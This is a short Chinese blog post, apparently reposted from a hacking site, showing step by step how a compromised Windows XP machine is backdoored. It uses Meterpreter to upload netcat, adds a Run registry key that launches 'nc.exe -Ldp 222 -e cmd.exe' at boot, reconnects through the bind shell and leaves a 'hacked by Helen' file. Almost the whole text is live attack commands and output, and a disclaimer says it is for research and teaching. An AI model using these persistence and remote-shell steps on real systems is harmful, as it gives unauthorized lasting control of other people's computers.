本菜已经通过九区最新的ping溢出,获得了一台机器的系统权限,我们来安装NC,方便下次DIR溢出,嗯!
上传NC到目标机器C://windows//system32//
meterpreter > upload /tmp/nc.exe C://windows//system32//
[*] uploading : /tmp/nc.exe -> C:/windows/system32/
[*] uploaded : /tmp/nc.exe -> C:/windows/system32//nc.exe
写入目标机器注册表开机启动项,恩,应该是这样吧...
meterpreter > reg setval -k HKLM//software//microsoft//windows//currentversion//run -v fuck -d C://windows//system32//nc.exe" -Ldp 222 -e cmd.exe"
Successful set fuck.
meterpreter > reg queryval -k HKLM//software//microsoft//windows//currentversion//Run -v fuck
Key: HKLM/software/microsoft/windows/currentversion/Run
Name: fuck
Type: REG_SZ
Data: C:/windows/system32/nc.exe -Ldp 222 -e cmd.exe
meterpreter > reboot
Rebooting...
meterpreter >
来看看,使用NC连接目标机器,DIR啊!!!有木有!!!
root@Dis9Team:/# cd /tmp/
root@Dis9Team:/tmp# nc 192.168.1.101 222
Microsoft Windows XP [锟芥本 5.1.2600]
(C) 锟斤拷权锟斤拷锟斤拷 1985-2001 Microsoft Corp.
C:/Documents and Settings/jj>dir
dir
锟斤拷锟斤拷锟斤拷 C 锟叫的撅拷没锟叫憋拷签锟斤拷
锟斤拷锟斤拷锟斤拷锟叫猴拷锟斤拷 B015-6347
C:/Documents and Settings/jj 锟斤拷目录
2011-06-23 19:57 <DIR> .
2011-06-23 19:57 <DIR> ..
2011-06-23 19:58 <DIR> Favorites
2011-06-23 19:58 <DIR> My Documents
2011-06-23 19:36 <DIR> 锟斤拷锟斤拷始锟斤拷锟剿碉拷
2011-06-23 19:36 <DIR> 锟斤拷锟斤拷
0 锟斤拷锟侥硷拷 0 锟斤拷
6 锟斤拷目录 8,643,579,904 锟斤拷锟斤拷锟斤拷
惊现Helen大黑客~
C:/>echo "hacked by Helen" >fuck.txt
echo "hacked by Helen" >fuck.txt
文章来自:哈客部落详文参考:http://www.hake.cc/a/anquanzhuanqu/wangzhananquan/anquanshentou/2012/1009/97652.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论